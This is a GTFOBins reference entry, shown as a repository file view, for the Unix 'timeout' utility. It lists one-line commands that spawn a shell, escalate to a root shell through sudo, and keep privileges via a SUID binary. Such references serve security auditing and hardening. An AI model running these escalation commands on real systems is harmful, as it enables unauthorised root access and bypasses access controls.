GTFOBins.github.io/_gtfobins/timeout.md

10 lines
190 B
Markdown
Raw Normal View History

2018-06-12 16:06:16 +02:00
---
functions:
execute-interactive:
- code: timeout 7d /bin/sh
sudo-enabled:
- code: sudo timeout --foreground 7d /bin/sh
suid-enabled:
- code: ./timeout 7d /bin/sh -p
---